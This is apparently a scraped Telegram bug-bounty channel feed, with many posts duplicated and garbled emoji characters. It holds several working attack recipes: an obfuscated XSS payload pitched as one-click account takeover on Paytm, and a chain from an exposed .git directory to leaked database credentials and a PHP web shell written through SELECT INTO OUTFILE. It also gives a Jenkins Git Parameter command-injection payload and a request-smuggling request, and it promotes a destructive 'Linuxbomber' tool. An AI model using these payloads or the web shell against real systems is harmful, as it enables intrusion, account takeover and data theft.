Hey Hunter's,
DarkShadow here back again, dropping a recent XSS patch in Paytm!
πStep to reproduce:
1. Enter the payload in search box
2. Grape the URL.
3. Send it to the victim.
4. One click account takeover!
β Payload:
Cradit ~@TEAM_DH049
#bugbountytips #xss
DarkShadow here back again, dropping a recent XSS patch in Paytm!
πStep to reproduce:
1. Enter the payload in search box
2. Grape the URL.
3. Send it to the victim.
4. One click account takeover!
β Payload:
<svg onload=(new Function('\u0073\u0074\u0072\u0069\u006e\u0067\u002e\u0066\u0072\u006f\u006d\u0043\u0068\u0061\u0072\u0043\u006f\u0064\u0065\u0028\u0039\u0037\u002c\u0031\u0030\u0038\u002c\u0031\u0030\u0031\u002c\u0031\u0030\u0039\u002c\u0031\u0031\u0036\u002c\u0034\u0030\u002c\u0034\u0039\u002c\u0034\u0039\u002c\u0034\u0039\u002c\u0034\u0031\u0029'))()>
Cradit ~
#bugbountytips #xss
1β€21π4π3π₯2
Hey Hunter's,
DarkShadow here back again....
Just wanted to announce all of you that:
Let me know what's your Instagram account id, i wanna see your chat's in Instagram π
Don't forget to follow me ππΌ x.com/darkshadow2bd
DarkShadow here back again....
Just wanted to announce all of you that:
β¨Instagram.com is my now π
Let me know what's your Instagram account id, i wanna see your chat's in Instagram π
Don't forget to follow me ππΌ x.com/darkshadow2bd
π±10π6β€4π«‘2π1
Hey Hunter's,
DarkShadow here back again, dropping one of my secret methodologies that turns a full Remote Code Execution!
π₯ From /.git to FULL RCE β The Ultimate Git-Based Exploitation Chainπ₯
π― Target: Exposed .git/ Directory
You found a target where /.git/ is publicly accessible?
Think it's just a low-hanging fruit misconfiguration?
Think again β weβre about to break that into Critical RCE π₯
π Tip: Use Chrome extensions like DotGit, GitHound, or your any favorite fuzzing tools.
βοΈ Step-by-Step Exploitation
Step 1: Dump the Git Repo
Use GitDumper from GitTools:
Step 2: Reconstruct the Source Code
β This restores all files from the latest commit, giving you full access to the source code.
Step 3: Explore Git History for Secrets
Look for hardcoded credentials, tokens, DB configs, etc.
π Realistic Example:
Weβve got database password!
Step 4: Connect to the Database
Step 5: Escalate to RCE via SQL
Check your privileges:
β If You Have FILE Privilege:
Write a web shell to the web root:
Then browse:
Boom π₯ β Remote Code Execution on the box!
If you enjoyed this methodology and want more exploitation chains, PoCs, and red team tips, make sure to follow me on X ππΌ x.com/darkshadow2bd
#bugbountytips
DarkShadow here back again, dropping one of my secret methodologies that turns a full Remote Code Execution!
π₯ From /.git to FULL RCE β The Ultimate Git-Based Exploitation Chainπ₯
π― Target: Exposed .git/ Directory
You found a target where /.git/ is publicly accessible?
Think it's just a low-hanging fruit misconfiguration?
Think again β weβre about to break that into Critical RCE π₯
π Tip: Use Chrome extensions like DotGit, GitHound, or your any favorite fuzzing tools.
βοΈ Step-by-Step Exploitation
Step 1: Dump the Git Repo
Use GitDumper from GitTools:
git clone https://github.com/internetwache/GitToolsπ This tool will recursively download the entire .git repository into /webCode
cd GitTools/Dumper
bash gitdumper.sh https://target.com/.git/ webCode
Step 2: Reconstruct the Source Code
cd webCode
git checkout .
β This restores all files from the latest commit, giving you full access to the source code.
Step 3: Explore Git History for Secrets
git log -p
Look for hardcoded credentials, tokens, DB configs, etc.
π Realistic Example:
commit 3b95f2c798a12427a1234b6d1234567890abcdef
Author: dev_admin <[email protected]>
Date: Thu Jul 11 17:32:15 2024 +0000
Added database config
diff --git a/config.php b/config.php
new file mode 100644
+++ b/config.php
@@ -0,0 +1,6 @@
+<?php
+$db_host = "258.20.78.55";
+$db_user = "root";
+$db_pass = "master_!pass2020";
+$db_name = "production";
+?>
Weβve got database password!
Step 4: Connect to the Database
mysql -h 258.20.78.55 -u root -p'master_!pass2020'
Step 5: Escalate to RCE via SQL
Check your privileges:
SHOW GRANTS FOR CURRENT_USER;
β If You Have FILE Privilege:
Write a web shell to the web root:
SELECT "<?php system($_GET['cmd']); ?>"
INTO OUTFILE '/var/www/html/shell.php';
Then browse:
https://target.com/shell.php?cmd=id
Boom π₯ β Remote Code Execution on the box!
If you enjoyed this methodology and want more exploitation chains, PoCs, and red team tips, make sure to follow me on X ππΌ x.com/darkshadow2bd
#bugbountytips
π₯20β€11π«‘5π1
β‘ COMMIX - Automated All-in-One OS Command Injection Exploitation Tool.
β https://github.com/commixproject/commix
#bugbountytips #bugbounty
β https://github.com/commixproject/commix
#bugbountytips #bugbounty
π₯10β€6
Need to quickly check for exposed backup files? Check out fuzzuli, a simple tool by @musana to quickly check for sensitive files! π€
π github.com/musana/fuzzuli
π github.com/musana/fuzzuli
β€8π₯3
Hey Hunter's,
DarkShadow here back again, just dropping a critical RCE...
π₯Jenkins Git Parameter Plugin β Command Injectionπ
The Jenkins plugin βGit Parameterβ (versions up to 439.vb_0e46ca_14534) allows attackers to inject arbitrary Git parameter values into shell commands.
Approximately 15,000 publicly accessible Jenkins servers have authentication disabled! And some others allow anyone to create accounts freely.
POC payload:
insert here $(YOUR OS COMMANDS)
So guy's if you like to more read latest POC's show your love's and share.
~DarkShadow
#bugbountytips #poc #Infosec #rce
DarkShadow here back again, just dropping a critical RCE...
π₯Jenkins Git Parameter Plugin β Command Injectionπ
The Jenkins plugin βGit Parameterβ (versions up to 439.vb_0e46ca_14534) allows attackers to inject arbitrary Git parameter values into shell commands.
Approximately 15,000 publicly accessible Jenkins servers have authentication disabled! And some others allow anyone to create accounts freely.
POC payload:
set parameter type: branch
Input the Payload in, set default value: $(sleep 80)
insert here $(YOUR OS COMMANDS)
So guy's if you like to more read latest POC's show your love's and share.
~DarkShadow
#bugbountytips #poc #Infosec #rce
β€16π3π2
Notes from "How to Crush Bug Bounties in the first 12 Months" by @hakluke
π₯16π¨βπ»1πΏ1
Guy's finally i made Linuxbomber.
A tool that exploit Linux environment and able to damage permanently any Linux OS even some case's it exploit hardware.
Let me know can i upload the tool in my GitHub?
Made just for educational purpose only
A tool that exploit Linux environment and able to damage permanently any Linux OS even some case's it exploit hardware.
Let me know can i upload the tool in my GitHub?
Made just for educational purpose only
π₯21π±5π4β€2π2π€1
One of my student in very 1st day of the Advanced Web Pentesing session, just performed a basic automation scan and got sensitive information disclosure.
β If you want to enroll and learn from very beginner level then DM us on https://wa.link/brutsecurity
β If you want to enroll and learn from very beginner level then DM us on https://wa.link/brutsecurity
π4
π¨ CVE-2025-53652: Jenkins Git Parameter Plugin Unvalidated Input Vulnerability
π₯PoC :https://github.com/pl4tyz/CVE-2025-53652-Jenkins-Git-Parameter-Analysis
πDorks
HUNTER : https://product.name="Jenkins"
π°Refer:https://jenkins.io/security/advisory/2025-07-09/#SECURITY-3419
https://github.com/advisories/GHSA-qcj2-99cg-mppf
π₯PoC :https://github.com/pl4tyz/CVE-2025-53652-Jenkins-Git-Parameter-Analysis
πDorks
HUNTER : https://product.name="Jenkins"
π°Refer:https://jenkins.io/security/advisory/2025-07-09/#SECURITY-3419
https://github.com/advisories/GHSA-qcj2-99cg-mppf
β€8
DomLoggerpp by @kevin_mizu is a simple web extension that helps you identify JavaScript DOM sinks that could lead to DOM-based vulnerabilities (such as XSS)! π
Check it out! π
π https://github.com/kevin-mizu/domloggerpp
Check it out! π
π https://github.com/kevin-mizu/domloggerpp
π₯7π1
This media is not supported in your browser
VIEW IN TELEGRAM
How to manually check for CL.TE Request Smuggling Vulnerabilities:
1οΈβ£ See if a GET request accepts POST
2οΈβ£ See if it accepts HTTP/1
3οΈβ£ Disable "Update Content-Length"
4οΈβ£ Send with CL & TE headers:
POST / HTTP/1.1
Host: <HOST-URL>
Content-Length: 6
Transfer-Encoding: chunked
0
G
5οΈβ£ Send request twice.
If you receive a response like "Unrecognized method GPOST", you've just confirmed a CL.TE vulnerability!
Try this out for yourself in our CL.TE lab: https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te
1οΈβ£ See if a GET request accepts POST
2οΈβ£ See if it accepts HTTP/1
3οΈβ£ Disable "Update Content-Length"
4οΈβ£ Send with CL & TE headers:
POST / HTTP/1.1
Host: <HOST-URL>
Content-Length: 6
Transfer-Encoding: chunked
0
G
5οΈβ£ Send request twice.
If you receive a response like "Unrecognized method GPOST", you've just confirmed a CL.TE vulnerability!
Try this out for yourself in our CL.TE lab: https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te
π19β€8π3π³1
CVE-2025-7384: Critical PHP Object Injection in WordPress Plugin
A critical vulnerability has been found in the Database for Contact Form 7, WPForms, and Elementor forms WordPress plugin. Since this is a backend-only plugin, it is not directly detectable through standard search dorks. Supported frontend plugins could help determine the scope. However, only about 1% of hosts identified this way are actually vulnerable.
π Netlas: https://nt.ls/Be3g6
βΉοΈ Advisory: https://nt.ls/RoI8t
A critical vulnerability has been found in the Database for Contact Form 7, WPForms, and Elementor forms WordPress plugin. Since this is a backend-only plugin, it is not directly detectable through standard search dorks. Supported frontend plugins could help determine the scope. However, only about 1% of hosts identified this way are actually vulnerable.
π Netlas: https://nt.ls/Be3g6
βΉοΈ Advisory: https://nt.ls/RoI8t
π5